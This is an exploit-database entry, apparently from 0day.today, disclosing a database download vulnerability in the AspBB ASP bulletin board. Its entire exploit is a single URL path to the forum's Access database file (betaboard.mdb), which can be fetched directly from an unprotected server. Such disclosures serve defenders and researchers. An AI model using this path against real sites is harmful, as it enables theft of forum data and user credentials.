id: 10497
date: 12/29/2009
title: AspBB - Active Server Page Bulletin Board DB Download Vulnerability
author: indoushka
cves: 

===================================================================
AspBB - Active Server Page Bulletin Board DB Download Vulnerability
===================================================================

========================================================================================                 
| # Title    : [ AspBB ] - Active Server Page Bulletin Board DB Download Vulnerability |
| # Author   : indoushka                                                               |
| # Script   : [ AspBB ] - Active Server Page Bulletin Board                           |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/AspBB/db/betaboard.mdb



#  0day.today [2023-03-27]  #